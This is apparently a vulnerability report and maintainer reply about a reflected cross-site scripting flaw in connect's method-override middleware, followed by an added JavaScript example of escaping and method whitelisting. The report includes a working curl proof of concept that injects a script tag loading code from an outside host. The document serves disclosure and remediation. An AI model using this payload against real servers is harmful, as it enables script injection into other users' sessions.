This middleware overwrites req.method with the req.body['_method'] value. When you don't catch the error, it responds with a default error msg: "Cannot [METHOD] [URL]" (https://github.com/senchalabs/connect/blob/6db901f967036ccc3c892b4bcb5bcb59e0b0dca9/lib/proto.js#L155). Because this is not sanitized enough, you can force a Cross-Site Scripting in the response:
~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /
This is very dangerous because in a server like ExpressJS it won't be handled with an app.all('/*', ...), so all servers using this middleware are vulnerable.
To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.
I patched with an escape for now, but I'll whitelist the methods as well. It's not a huge vulnerability since you can't easily pass around a POST, but it doesn't hurt to escape. Thanks for the report.
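
The two fixes discussed in this thread (escaping the reflected method in the default error body, and whitelisting the values accepted from `_method`), as an added example that is not part of the original thread and not connect's own code. The function names, the allowed-method list and the sample request object are assumptions made for illustration.

```javascript
// Added example: hypothetical hardened versions of the override middleware
// and of the default "Cannot [METHOD] [URL]" response body.

// Assumed allow-list: only these verbs may replace req.method.
const ALLOWED_METHODS = new Set(
  ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS']
);

// Minimal HTML escaper for values reflected into an HTML response.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fix 1 (whitelist): ignore _method unless it names a known verb.
function methodOverride(req, res, next) {
  req.originalMethod = req.originalMethod || req.method;
  const override = req.body && req.body._method;
  if (typeof override === 'string') {
    const candidate = override.toUpperCase();
    if (ALLOWED_METHODS.has(candidate)) req.method = candidate;
    delete req.body._method; // never pass the raw value downstream
  }
  next();
}

// Fix 2 (escape): the fallback body escapes both reflected values, so it
// stays safe even if some other code path sets req.method to markup.
function notFoundBody(req) {
  return 'Cannot ' + escapeHtml(req.method) + ' ' + escapeHtml(req.url);
}

// Constructed request shaped like the POST in the report, body already parsed.
function demo(methodValue) {
  const req = { method: 'POST', url: '/', body: { _method: methodValue } };
  methodOverride(req, {}, () => {});
  return { method: req.method, body: notFoundBody(req) };
}
```

Either fix alone closes the reflected value shown in the report; applying both keeps the error page safe if a later change reintroduces an unvalidated method.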